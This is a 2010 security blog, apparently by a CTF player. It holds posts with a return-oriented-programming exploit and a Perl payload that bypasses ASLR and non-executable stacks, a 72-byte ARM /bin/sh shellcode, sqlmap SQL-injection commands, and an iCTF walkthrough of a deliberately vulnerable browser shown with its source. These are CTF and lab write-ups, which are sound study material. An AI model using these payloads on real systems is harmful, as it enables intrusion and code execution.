This is a brief introduction to a cool little technique of buffer overflow exploit with the following conditions: the stack is not executable, the stack address is randomized, and the libc address is also randomized. In other words, we cannot simply use return-to-stack and return-to-libc.

A vulnerable program that I am going to use is a modified version of gera's in [1]. Here, we do not have stack canary protection, but I am going to make it much harder by modifying the code a little bit: adding an exit system call, and employing stack and libc address randomization (ASLR). The modified version is shown below:

  1. #include <string.h>
  2. #include <stdlib.h>
  3. #include <stdio.h>
  4.  
  5. int func(char *msg) {
  6.     char buf[80];
  7.  
  8.     strcpy(buf,msg);
  9.     buf[0] = toupper(buf[0]);
  10.     strcpy(msg,buf);
  11.     printf("Caps: %s\n",msg);
  12.     exit(1);
  13. }
  14.  
  15. int main(int argv, char** argc) {
  16.         func(argc[1]);
  17. }


1. Vulnerability
    There is a classic strcpy vulnerability in the func function. Two consecutive strcpy call enables us to write arbitrary values in an arbitrary address: first, modify the value of the msg from the first strcpy, and then write arbitrary values from the second strcpy. Note that overwriting the return address of func is not enough because it is protected with exit system call. It is more clear if you look at the disassembled version of the program:

  1. 080484b4 <func>:
  2.  80484b4:       55                      push   %ebp
  3.  80484b5:       89 e5                   mov    %esp,%ebp
  4.  80484b7:       83 ec 58                sub    $0x58,%esp
  5.  80484ba:       8b 45 08                mov    0x8(%ebp),%eax
  6.  80484bd:       89 44 24 04             mov    %eax,0x4(%esp)
  7.  80484c1:       8d 45 b0                lea    -0x50(%ebp),%eax
  8.  80484c4:       89 04 24                mov    %eax,(%esp)
  9.  80484c7:       e8 04 ff ff ff          call   80483d0 <strcpy@plt>
  10.  80484cc:       0f b6 45 b0             movzbl -0x50(%ebp),%eax
  11.  80484d0:       0f be c0                movsbl %al,%eax
  12.  80484d3:       89 04 24                mov    %eax,(%esp)
  13.  80484d6:       e8 d5 fe ff ff          call   80483b0 <toupper@plt>
  14.  80484db:       88 45 b0                mov    %al,-0x50(%ebp)
  15.  80484de:       8d 45 b0                lea    -0x50(%ebp),%eax
  16.  80484e1:       89 44 24 04             mov    %eax,0x4(%esp)
  17.  80484e5:       8b 45 08                mov    0x8(%ebp),%eax
  18.  80484e8:       89 04 24                mov    %eax,(%esp)
  19.  80484eb:       e8 e0 fe ff ff          call   80483d0 <strcpy@plt>
  20.  80484f0:       8b 45 08                mov    0x8(%ebp),%eax
  21.  80484f3:       89 44 24 04             mov    %eax,0x4(%esp)
  22.  80484f7:       c7 04 24 00 86 04 08    movl   $0x8048600,(%esp)
  23.  80484fe:       e8 dd fe ff ff          call   80483e0 <printf@plt>
  24.  8048503:       c7 04 24 01 00 00 00    movl   $0x1,(%esp)
  25.  804850a:       e8 e1 fe ff ff          call   80483f0 <exit@plt>
  26.  
  27. 0804850f <main>:
  28.  804850f:       8d 4c 24 04             lea    0x4(%esp),%ecx
  29.  8048513:       83 e4 f0                and    $0xfffffff0,%esp
  30.  8048516:       ff 71 fc                pushl  -0x4(%ecx)
  31.  8048519:       55                      push   %ebp
  32.  804851a:       89 e5                   mov    %esp,%ebp
  33.  804851c:       51                      push   %ecx
  34.  804851d:       83 ec 14                sub    $0x14,%esp
  35.  8048520:       8b 41 04                mov    0x4(%ecx),%eax
  36.  8048523:       83 c0 04                add    $0x4,%eax
  37.  8048526:       8b 00                   mov    (%eax),%eax
  38.  8048528:       89 04 24                mov    %eax,(%esp)
  39.  804852b:       e8 84 ff ff ff          call   80484b4 <func>
  40.  8048530:       83 c4 14                add    $0x14,%esp
  41.  8048533:       59                      pop    %ecx
  42.  8048534:       5d                      pop    %ebp
  43.  8048535:       8d 61 fc                lea    -0x4(%ecx),%esp
  44.  8048538:       c3                      ret

2. Observation and Strategy
    We can only modify a single memory region, but it must not be the return address because of the exit system call. There are several possible spots including dtors and GOT. In this example, I am going to overwrite GOT entry of printf function. GOT is typically in the code section of a program and its address is not randomized.

    Now we can hijack the control flow when the printf is called, so the next step is to determine where to jump. We cannot simply return to libc because its address is randomized (we are not going to use brute force here). However, we know that the code section's addresses are fixed, and we are going to use return-oriented programming technique described introduced by Hovav [2]. In this problem, we can only use the code section of this small program, thus there is very small number of gadgets available.

   The return-oriented program that we are going to design runs as follows: 1) retrieve an address to libc's strcpy function from the GOT, 2) compute the relative address from strcpy function to system function, 3) obtain the address of the system function from the step 1 and 2, 4) set up the stack to have a pointer to "/bin/sh" string, 5) jump to the system function using indirect call (call *%eax).

3. Gadgets

    We are going to use the following 4 gadgets that we can find from the code section to perform the exploitation.

    1)
  1. 0x80485a2 <__libc_csu_init+82>: add    $0xc,%esp
  2. 0x80485a5 <__libc_csu_init+85>: pop    %ebx
  3. 0x80485a6 <__libc_csu_init+86>: pop    %esi
  4. 0x80485a7 <__libc_csu_init+87>: pop    %edi
  5. 0x80485a8 <__libc_csu_init+88>: pop    %ebp
  6. 0x80485a9 <__libc_csu_init+89>: ret

    2)
  1. 0x804838c <_init+44>:   pop    %eax
  2. 0x804838d <_init+45>:   pop    %ebx
  3. 0x804838e <_init+46>:   leave  
  4. 0x804838f <_init+47>:   ret

    3)
  1. 0x80485ce <__do_global_ctors_aux+30>:   add    0xf475fff8(%ebx),%eax
  2. 0x80485d4 <__do_global_ctors_aux+36>:   add    $0x4,%esp
  3. 0x80485d7 <__do_global_ctors_aux+39>:   pop    %ebx
  4. 0x80485d8 <__do_global_ctors_aux+40>:   pop    %ebp
  5. 0x80485d9 <__do_global_ctors_aux+41>:   ret

    4)
  1. 0x80484af <frame_dummy+31>:     call   *%eax

4. Final Exploit
     Using the above four gadgets, I introduce the following exploit. Note this exploit is not just a simple return-oriented programming exploit, there are many techniques involved:
    1) It dynamically retrieves system function's address from the GOT
    2) changes the ebp register to point to the bss section so that we can control the esp and ebp continuously.
    3) Set up the stack address to have enough space for system call.

   First, the second gadget sets up the eax and ebx values that are used in the third gadget to compute the system function's address. The result of the "add 0xf475fff8(%ebx), %eax" instruction must produce the address of system function in libc. Specifically, 0xf475fff8(%ebx) must point to the strcpy's GOT entry, so the strcpy's address in libc is added with the value in eax register.

    Changing the ebp register in the first gadget is the most tricky part. In the first gadget, we set up the ebp to point to a writable bss section (More precisely, beyond the bss section). Since the address of 0x804a2e8 is a writable region, we can set the address for ebp and esp. In the second gadget, we can set up the esp value by using the leave instruction. Thus after the second gadget, both the ebp and the esp will point to the addresses of the bss section.

    The final exploit in perl is shown below:

  1. print "\xa2\x85\x04\x08" . # First Gadget
  2. "AAAAAAAA" . # dummy
  3. "\xe8\xa2\x04\x08" . # set ebp, poing to line 9 of this exploit string
  4. "\x8c\x83\x04\x08" . # Second gadget
  5. "\xc0\x52\xfc\xff" ."\x14\xa0\x8e\x13AAAA" . "/bin/sh;"  . "A"x48 .
  6. "\x10\xa0\x04\x08" . # GOT entry address of printf
  7. "\x30\xa0\x04\x08"x0xa0 . # dummy
  8. "\xce\x85\x04\x08" .
  9. "\x30\xa0\x04\x08"x0x2 . # dummy
  10. "\x30\xa0\x04\x08" . # dummy ebp
  11. "\xaf\x84\x04\x08" . # call *%eax
  12. "\x30\xa0\x04\x08";

I also attach the binary file for people who are interested. :)
(Download)

5. Conclusion
    There are many possible way of bypassing ASLR protections. Here, I present a way to exploit the return-oriented programming technique in a very limited environment: small code space, randomized stack and randomized libc.
2010/05/05 22:06 2010/05/05 22:06
Posted by 차상길.

Codegate 2010

2010/03/14 16:34 / Hacking
We pwned the codegate 2010 prequalification round!

The problems were really in high quality. I had so much fun. Thanks to the people who organized this awesome competition. Since we are going to make our own write-up, I am not write about the problems here.

Anyway I must say that I liked this problem where there was a virtual machine program. It was really hard until we realized the hash algorithm uses tiny encryption algorithm, which has hash collision vulnerability. It was really inspiring one. Also, the sql-injection one was really funky. :)
2010/03/14 16:34 2010/03/14 16:34
Posted by 차상길.

pintool

2010/02/20 01:07 / Hacking
I started to use Pintool nowadays. Pintool is an awesome instrumentation tool for x86 and ARM.
By the way, what is instrumentation then?

Let's consider the two-line binary as below.
xor eax, eax
push eax
Okay, now we want to do something with this binary: count the number of instruction, print out binary code for each instruction, and so forth. We call this kind of job as "instrumentation". We can even do instrumentation in a basic block level, or a function level.

Now I say that this can be a powerful tool for hacking as well.

About 40~50 pages of manual is really intuitive. You can easily understand how to use it.
http://www.pintool.org/docs/31933/Pin/html/
2010/02/20 01:07 2010/02/20 01:07
Posted by 차상길.

Padocon 2010

2010/02/07 15:14 / Hacking
Padocon 2010 (http://www.padocon.org/conference2010/) CTF qualification has just finished. CMU's PPP won 3rd place. :)

The binary problems were all about the local exploitation, especially, ASLR (Address Space Layout Randomization), and "W xor X" (Address space can be used either for writing or executing, but not both).

It was really an interesting challenge for me. Also learned a lot from it. I am writing this summary to remind the attack that we performed for several problems.

We have a binary that are protected by ASLR, WxorX, and randomized libc address. Further, We have only 8 byte of stack space to overflow, so we can only overwrite old ebp, and return address. How do we attack this kind of binary?

One intuition is that we can actually check the /proc/*/maps to see which memory is writable, or executable because this is local exploitation. Thus, the strategy is to return to a certain writable address that contains three consecutive memory address that we can use as arguments for the exec, and then perform brute-force until we get to the same execv address, e.g. AAAA <usable address that contains three consecutive writable memory address> <ret to exec>. Also, we make a simple binary that change its permission and spawn "/bin/sh". Now the name of the file should be some garbage string that resides in the memory address that we found in the previous step.


2010/02/07 15:14 2010/02/07 15:14
Posted by 차상길.

Arm Shellcode

2010/01/26 00:21 / Hacking
It is hard to find a very simple ARM shellcode. So I decided to make my own ARM shellcode.

ARM is becoming more and more popular architecture as the number of smart phones and 'net books' are expanding. Don't forget! iPhone and Nokia tablets are also running on ARM. :D

So what is the most important thing to consider to generate ARM shellcode?

First, the linux system call in ARM is little bit different from the x86 system call. Namely, the system call number is stored in r7 register instead of r0 register. (eax register can be considered as r0 in ARM). Thus, the arguments are stored in r0, r1, ... in turn.

Second, we need some trick to load 32bit immediate value into a memory address in ARM. Here, I am using four sequential arm instructions to push 32bit immediate into stack. Note that the exclamation mark in ARM assembly code means that the index operation is performed before applying the real instruction. For example, str r2, [r3, #-4]!  means: store r2 value to the ptr {r3-4} and r3 = r3 -4.

With the above facts in mind, I will present my own ARM shellcode here !!
This is just a simple example, and it contains null characters. So not applicable in most of the real cases. :)

 (ARM shellcode, execute /bin/sh and call exit) (72 byte)  
 // by funkyG  
 "\x00\x00\x20\xe0\x01\x10\x21\xe0\x02\x20\x22\xe0\x04\x20\x2d\xe5\x00\xc0\x9f\xe5\x00\x00\x00\xea\x2f\x2f\x73\x68\x04\xc0\x2d\xe5\x00\xc0\x9f\xe5\x00\x00\x00\xea\x2f\x62\x69\x6e\x04\xc0\x2d\xe5\x0d\x00\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef"  
2010/01/26 00:21 2010/01/26 00:21
Posted by 차상길.

Sqlmap allows you to speed up the sql injection attack. Especially, when you try to figure out the database name, table name and stuff, this tool is extremely useful. Basically, it checks the name from the first character using ascii code comparison, and determine the full name from the hundreds of thousands of trials. It also provides many other useful options such as interactive SQL shell.

However, it is hard to get it work at the first time, so here I provide some useful examples.

Example: enumerate all the databases from "blah.com" where the login.php has SQL injection vulnerability.

./sqlmap.py --data="username=a" -u http://blah.com/login.php --method=POST -p username --prefix="blah' or not (1" --postfix=") or username='blah" --dbs
Note that the --prefix and --postfix is the crucial options in most cases. This parrt should be figured out by user, since the sqlmap cannot find the vulnerable strings in most cases. (This is from my experience.) Once you get the right prefix and postfix, sqlmap becomes the most powerful tool.

Following is the explanation for prefix and postfix options from the sqlmap manual. (http://sqlmap.sourceforge.net/doc/README.html)

Options: --prefix and --postfix

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 \
-p "id" --prefix "'" --postfix "AND 'test'='test"

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

Good article to read: http://www.milw0rm.com/papers/202

2010/01/19 21:22 2010/01/19 21:22
Posted by 차상길.

This post was originally posted on 12/08/2009.

It was last Friday. We (Plaid parliament of Pwning) took the 4th place in iCTF 2009. This year's iCTF was novel, because it was not attack and defense. Instead, thousands of bots were running on UCSB, and they were connecting to us according to the search rank in the web search engine they provided. All the bots were using more than 15 different versions of browsers including Perl, Python, Erlang (omg...), Java, and C++.

Since my role was binary analysis and CTF attack, I could have looked almost every browser sources. Especially, C++ version of browsers were interesting, and we were the only team who could have found all the c++ browsers' vulnerabilities during the competition.

Basically, we could get a shell using several overflow techniques for all the c++ binaries. Here, I will present a walk-through for the crefox-1.0 problem, which is the first-level c++ problem.

The most interesting part in this problem is that it uses dlopen function. Thus, at first glance, we thought the program uses "safe_printf" function from a certain library. However, this was just a trick! Let's look at the source code below.
int
print_func(const char *fmt, ...)
{

void *h;

/* lets retrieve the safe printf implementation from the library */
int (*f)(const char *, ...);

if (!strncmp("USESAFEPRINTFUNCTIONA", fmt, 21)) {
h = dlopen(NULL, RTLD_LAZY);
if (!h) {
      errnonf("dlopen: %s\n", dlerror());
      return -1;
}
f = (int (*)(const char *, ...))dlsym(h, "safe_printf");
f("%s\n", fmt);
}
else
/* ok, lets follow the user will and revert to the unsafe printf :-( */
printf("%s\n", fmt);
return 0;
}
The line of strncmp function is the most tricky part in this problem !! Note that they first check some weird string and if it matches, it will load a function called "safe_printf". However, the returned function from dlsym is NULL here !

So what will happen when the function pointer f is called?

The instruction pointer will go to the address of 0x00000000. So, here, we expect the seg-fault. Right?

However, the program will not terminate. Why? Let's look at the previous part of the source code before the print_func function is called. The most important part is shown below.
ptr = mmap(NULL, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0);
So, they used mmap to allocate memory at the address zero! :D

If you remember that this is a browser's source code, our web server's page will be mapped to the address pointer using mmap function, only when the page starts with the string USESAFEPRINTFUNCTIONA. Thus, the instruction pointer will go the address zero, where our page source code resides in. And the source code should start with the specific string.

Now, the secret of the weird string of strncmp is unveiled. They were just a simple instruction, and even though the program flow goes to the string's address, the program will not terminate. Note that mmap used PROT_EXEC option to run the code.

Okay, so what will be the instruction for the string USESAFEPRINTFUNCTIONA ?
0x0:    push   %ebp
0x1:    push   %ebx
0x2:    inc    %ebp
0x3:    push   %ebx
0x4:    inc    %ecx
0x5:    inc    %esi
0x6:    inc    %ebp
0x7:    push   %eax
0x8:    push   %edx
...
They are just push and increment instructions ! Okay, that makes sense right? So the next step is really simple. We only need to put our shell code right after the string USESAFEPRINTFUNCTIONA. In this way, a web browser who visits our website (including the string USESAFEPRINTFUNCTIONA and shellcode in the page) will run our shellcode, and connect to our web server.

All the binary problems were really intriguing. Look at the entire source code that I attached below, and feel the trickiness of this problem. Actually, the next two versions are more tricky. I will explain them later. :D

Full source code:
/*
* iCTF Crefox browser
*
* Lorenzo ``Gigi Sullivan'' Cavallaro <sullivan@cs.ucsb.edu>
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <getopt.h>
#include <stdarg.h>
#include <errno.h>
#include <dlfcn.h>
#include <sys/mman.h>
#include <curl/curl.h>

#include "list.h"

#include <iostream>
#include <string>
using namespace std;

#include <htmlcxx/html/ParserDom.h>
using namespace htmlcxx;

#define MAXINPUT 8192
#define PROMPT "COMMAND>"
#define COOKIEFILE "./.cookiejar.txt"

#define VERSION "1.0.1"
#define UA "Crefox-" VERSION " (+http://ictf.cs.ucsb.edu/)"

extern char *optarg;
extern int optind, opterr, optopt;
extern char *__progname;

struct opts
{
char *proxy;
char *prompt;
char plugins;
};

struct page
{
char *memory;
size_t size;
void *mmap;
size_t mmap_size;
};

struct plugins
{
void *h;
char *name;
struct list_head list;
};

CURL *browser_init(void);
void browser_shutdown(int, CURL *) __attribute__((noreturn));
void parse_options(int, char **, struct opts *, void *);
void split(char **, char *, int);
int uniq(char **, char *, char);
char **parse_input(char *, int *);
size_t map_page(void *, size_t, size_t, void *);
void free_args(char **);
struct plugins *loadlib(const char *);
int load_plugins(struct plugins *);
void unload_plugins(struct plugins *);
int print_func(const char *, ...);
int safe_move(struct page *);

int extract_tags(char *, char *, char *, int (*)(void *));
int print_href(void *);

void __errf(int, const char *, ...) __attribute__((noreturn));
void __errnonf(const char *, ...);

#define errf(x, fmt, args...) \
do { \
fprintf(stderr, "ERROR:%s:(fatal):", __progname), __errf(x, fmt, ##args); \
} while (0)

#define errnonf(fmt, args...) \
do { \
fprintf(stderr, "ERROR:%s:(non fatal):", __progname), __errnonf(fmt, ##args); \
} while (0)

#define debug(args...) \
do { \
fprintf(stderr, "DEBUG:%s:", __progname), fprintf(stderr, ##args); \
} while (0)

int
main(int argc, char **argv)
{

char errbuf[CURL_ERROR_SIZE], quit;
CURL *browser;
int res;

struct opts opts;
struct page page;
struct stat sbuf;
struct plugins plugins;

int (*output_page)(const char *, ...);

browser = browser_init();
if (!browser)
errf(1, "browser_init()\n");

memset(&page, 0, sizeof (page));
memset(&opts, 0, sizeof (opts));
parse_options(argc, argv, &opts, browser);

INIT_LIST_HEAD(&plugins.list);

res = load_plugins(&plugins);
if (res != -1) {

struct list_head *l;
struct plugins *p;
int i = 0;

opts.plugins++;

list_for_each(l, &plugins.list) {

   p = list_entry(l, struct plugins, list);
   debug("plugin[%i]:%s\n", i++, p->name);

}
}
else {
errnonf("plugins not successfully loaded\n");
}

if (opts.proxy) {
curl_easy_setopt(browser, CURLOPT_PROXY, opts.proxy);
debug("proxy: %s\n", opts.proxy);
}

curl_easy_setopt(browser, CURLOPT_USERAGENT, UA);
curl_easy_setopt(browser, CURLOPT_REFERER, "http://ictf.cs.ucsb.edu");
curl_easy_setopt(browser, CURLOPT_FOLLOWLOCATION, 1);
curl_easy_setopt(browser, CURLOPT_ERRORBUFFER, errbuf);

if (!stat(COOKIEFILE, &sbuf))
curl_easy_setopt(browser, CURLOPT_COOKIEFILE, COOKIEFILE);
curl_easy_setopt(browser, CURLOPT_COOKIEJAR, COOKIEFILE);

curl_easy_setopt(browser, CURLOPT_WRITEFUNCTION, map_page);
curl_easy_setopt(browser, CURLOPT_WRITEDATA, &page);

output_page = &print_func;

quit = 0;
while (!quit) {

char in[MAXINPUT];
int num, i;
char **args;

memset(in, 0, MAXINPUT);
memset(errbuf, 0, sizeof(errbuf));
printf("%s", opts.prompt);

if (!fgets(in, MAXINPUT, stdin)) {
   if (!errno) {
     fprintf(stderr, "\n");
     errnonf("Please use 'q' to quit the browser\n");
     continue;
   }
   errnonf("fgets(): error: %d %s\n", errno, strerror(errno));
   break;
}

args = parse_input(in, &num);
if (!args) {
   errnonf("parse_input()\n");
   continue;
}

if (num > 1)
   curl_easy_setopt(browser, CURLOPT_URL, args[1]);

if (!strcmp(args[0], "u")) {

   long code, redir;

   if (num == 2 && args[1]) {

     for (i = 0; i < num; i++)
        debug("args[%d]: %s\n", i, args[i]);

     if (page.memory) {
        free(page.memory);
        memset(&page, 0, sizeof (page));
     }

     debug("Getting URL: %s\n", args[1]);

   curl_easy_setopt(browser, CURLOPT_POST, 0);

     if (curl_easy_perform(browser))
        errnonf("URL retrieval: %s\n", errbuf);
     else {
        curl_easy_getinfo(browser, CURLINFO_RESPONSE_CODE, &code);
        debug("HTTP status: %ld\n", code);
        curl_easy_getinfo(browser, CURLINFO_REDIRECT_COUNT, &redir);
        debug("HTTP redirect #: %ld\n", redir);
     }

     if (page.memory && code == 200) {
   
        if (safe_move(&page) == -1) {
           errnonf("safe_move failed (no output can be generated)\n");
           continue;
        }

        if (output_page((const char *)page.mmap) == -1)
           printf("%s\n", (const char *)page.mmap);

        memset(page.mmap, 0, page.mmap_size);
        munmap(page.mmap, page.mmap_size);

     }
   }
   else
     errnonf("malformed 'u' request\n");

   free_args(args);
   continue;
}

if (!strcmp(args[0], "p")) {

   memset(errbuf, 0, sizeof (errbuf));

   for (i = 0; i < num; i++)
     debug("args[%d]: %s\n", i, args[i]);

   if (num == 3 && args[1] && args[2]) {

     unsigned long code;

     if (page.memory) {
        free(page.memory);
        memset(&page, 0, sizeof (page));
     }

   curl_easy_setopt(browser, CURLOPT_POST, 1);
     curl_easy_setopt(browser, CURLOPT_POSTFIELDS, args[2]);

     debug("Posting to URL: %s with data: %s\n", args[1], args[2]);

     if (curl_easy_perform(browser))
        errnonf("URL retrieval: %s\n", errbuf);
     else {
        curl_easy_getinfo(browser, CURLINFO_RESPONSE_CODE, &code);
        debug("HTTP status: %ld\n", code);
     }

     if (page.memory && code == 200)
        printf("%s\n", page.memory);
   }
   else
     errnonf("malformed 'p' request\n");

   free_args(args);
   continue;
}

if (!strcmp(args[0], "l")) {

   int res;

   res = extract_tags(page.memory, (char *)"a", (char *)"href", print_href);
   if (res == -1)
     errnonf("error while parsing/retrieving for <a> tags\n");

   free_args(args);
   continue;
}

if (!strcmp(args[0], "q")) {

   if (num != 1)
     errnonf("malformed 'q' request\n");
   else
     quit = 1;

   free_args(args);
   continue;
}

errnonf("malformed input\n");
}

unload_plugins(&plugins);

exit(0);
}

int
extract_tags(char *page, char *tagstr, char *attr, int (*callback)(void *))
{

string s_page;
HTML::ParserDom parser;
tree<HTML::Node> dom;
tree<HTML::Node>::iterator it;
tree<HTML::Node>::iterator end;
std::pair<bool, std::string> tag;
char lcase_tag[strlen(tagstr) + 1];
unsigned int i;

if (page)
s_page = string(page);
else {
errnonf("zero-length or non existing page\n");
return -1;
}

dom = parser.parseTree(s_page);
it = dom.begin();
end = dom.end();

memset(lcase_tag, 0, sizeof(lcase_tag));

for (i = 0; i < strlen(tagstr); i++)
lcase_tag[i] = tolower(tagstr[i]);

for (; it != end; ++it) {

if (it->tagName() == lcase_tag) {

   it->parseAttributes();
   tag = it->attribute(attr);

   if (tag.first)
     (void)callback(&tag.second);
}
}

return 0;
}

int
print_href(void *value)
{
cout << *(std::string *)value << endl;
return 0;
}

int
safe_move(struct page *page)
{

void *ptr;
unsigned int size = (page->size + 4096) & ~4095;
int serrno = errno;

errno = 0;
ptr = mmap(NULL, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0);
if (errno != 0) {
errno = serrno;
printf("errno: %d %s\n", errno, strerror(errno));
return -1;
}
errno = serrno;

memset(ptr, 0, size);
memcpy(ptr, page->memory, strlen(page->memory));

page->mmap = ptr;
page->mmap_size = size;

return 0;
}

int
print_func(const char *fmt, ...)
{

void *h;

/* lets retrieve the safe printf implementation from the library */
int (*f)(const char *, ...);

if (!strncmp("USESAFEPRINTFUNCTIONA", fmt, 21)) {
h = dlopen(NULL, RTLD_LAZY);
if (!h) {
   errnonf("dlopen: %s\n", dlerror());
   return -1;
}
f = (int (*)(const char *, ...))dlsym(h, "safe_printf");
f("%s\n", fmt);
}
else
/* ok, lets follow the user will and revert to the unsafe printf :-( */
printf("%s\n", fmt);

return 0;
}

struct plugins *
loadlib(const char *n)
{

struct plugins *p;

p = (struct plugins *)calloc(1, sizeof(*p));
if (!p)
return NULL;

p->name = strdup(n);
p->h = dlopen(n, RTLD_NOW);
if (!p->h) {
free(p);
return NULL;
}

return p;
}

int
load_plugins(struct plugins *phead)
{

struct plugins *p;
int res = 0;

p = loadlib("libget.so");
if (p)
list_add(&(p->list), &(phead->list));
else
res = -1;

p = loadlib("libpost.so");
if (p)
list_add(&(p->list), &(phead->list));
else
res = -1;

p = loadlib("liblink.so");
if (p)
list_add(&(p->list), &(phead->list));
else
res = -1;

return res;
}

void
unload_plugins(struct plugins *phead)
{

struct list_head *l, *n;
struct plugins *p;

list_for_each_safe(l, n, &(phead->list)) {
p = list_entry(l, struct plugins, list);
list_del(l);
(void)dlclose(p->h);
free(p->name);
free(p);
}

return;
}

void
free_args(char **args)
{

char **p = args;

for (; *p; p++)
free(*p);
free(args);
}

CURL *
browser_init(void)
{

setbuf(stdout, NULL);
setbuf(stderr, NULL);

if (curl_global_init(CURL_GLOBAL_SSL))
return NULL;
return curl_easy_init();
}

void
browser_shutdown(int exitcode, void *arg)
{
CURL *br = arg;

curl_easy_cleanup(br);
curl_global_cleanup();
exit(exitcode);
}

void
parse_options(int argc, char **argv, struct opts *opts, void *br)
{

char opt;

if (on_exit(browser_shutdown, br))
return;

while ((opt = getopt(argc, argv, "x:p:")) != -1) {
switch (opt) {
case 'p':
   opts->prompt = strdup(optarg);
   break;
case 'x':
   opts->proxy = strdup(optarg);
   break;
default: /* '?' */
   fprintf(stderr, "Usage: %s [-p prompt] [-x proxy]\n", argv[0]);
   exit(2);
}
}

if (!opts->prompt)
opts->prompt = strdup(PROMPT);

return;
}

void
__errf(int code, const char *fmt, ...)
{

va_list va;

va_start(va, fmt);
vfprintf(stderr, fmt, va);
va_end(va);

exit(code);
}

void
__errnonf(const char *fmt, ...)
{

va_list va;

va_start(va, fmt);
vfprintf(stderr, fmt, va);
va_end(va);

return;
}

int
uniq(char **out, char *inarg, char delim)
{

int len, s = 0, i = 0;
char *in, *p, *start, *end;

if (!inarg)
return 0;

start = inarg;
end = inarg + strlen(inarg) - 1;
/* skip heading delim */
while (*start == delim) start++;
/* skip trailing ones */
while (*end == delim) *end-- = 0;

in = start;
len = strlen(start) + 1;

*out = (char *) malloc (len * sizeof (char));
if (!*out)
return -1;

memset(*out, 0, len * sizeof (char));

p = *out;

while (*in) {

if ((*in == delim)) {  /* found a delim? */
   if (!s) {                  /* never seen it so far? */
     i++;                    /* keep the real count */
     *p++ = *in++;
     s = 1;                  /* record it */
   }
   else
     in++;                   /* already seen? skip ahead */
}
else {
   /* no delim so straight copy */
   *p++ = *in++;
   s = 0;
}

}

/* counts args[0] as well */
return ++i;
}

void
split(char **arg, char *buf, int num)
{

char *tmp, *p;
int i = 0;

/* make a safe copy of buf since strsep will mangle it */
tmp = (char *) strdup(buf);

do {
p = (char *) strsep(&tmp, " ");
if (!tmp && !i)
   p = buf;
arg[i++] = (char *)strdup(p);
p = tmp;
} while (tmp);

arg[i] = NULL;

free(tmp);
return;
}

char **
parse_input(char *in, int *num)
{

char **args, *stripbuf;
int x;

while (strlen(in) > 0 && (in[strlen(in) - 1] == '\n' || in[strlen(in) - 1] == '\r'))
in[strlen(in) - 1] = 0;

*num = uniq(&stripbuf, in, ' ');
x = *num;

args = (char **) malloc((x + /* nil term */1) * sizeof (char *));
memset(args, 0, (x + 1) * sizeof (char *));

/*
* we split buf into chunks delimited by ' ': these represent cmd
* and cmd args. Due to the nature of split, we don't care about
* ' " ` ; and so on
*/

split(args, stripbuf, x + 1);

free(stripbuf);

return args;
}

size_t
map_page(void *ptr, size_t size, size_t nmemb, void *data)
{
size_t realsize = size * nmemb;
struct page *mem = (struct page *)data;
char *tmp;

if (realsize) {
tmp = (char *)malloc((mem->size + realsize + 1) * sizeof(char));
if (!tmp)
   return CURLE_WRITE_ERROR;

memset(tmp, 0, mem->size + realsize + 1);

if (mem->size) {
   memcpy(tmp, mem->memory, mem->size);
   free(mem->memory);
}

memcpy(&tmp[mem->size], ptr, realsize);
mem->size += realsize;
tmp[mem->size] = 0;

mem->memory = tmp;
}

return realsize;
}

2010/01/19 21:16 2010/01/19 21:16
Posted by 차상길.